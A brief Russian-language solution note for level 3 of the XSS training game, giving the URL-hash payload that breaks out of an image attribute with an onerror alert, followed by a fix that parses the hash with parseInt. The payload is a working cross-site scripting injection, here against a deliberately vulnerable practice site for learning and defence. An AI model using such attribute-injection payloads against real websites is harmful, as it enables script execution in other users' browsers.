Решение:
В поисковую строку
https://xss-game.appspot.com/level3/frame#3' onerror='alert()';

Защита:
Парсировать хеш страницы в чисолв с помощью parseInt
Если значение можно спарсить в число, то возвращается число. Иначе - NaN
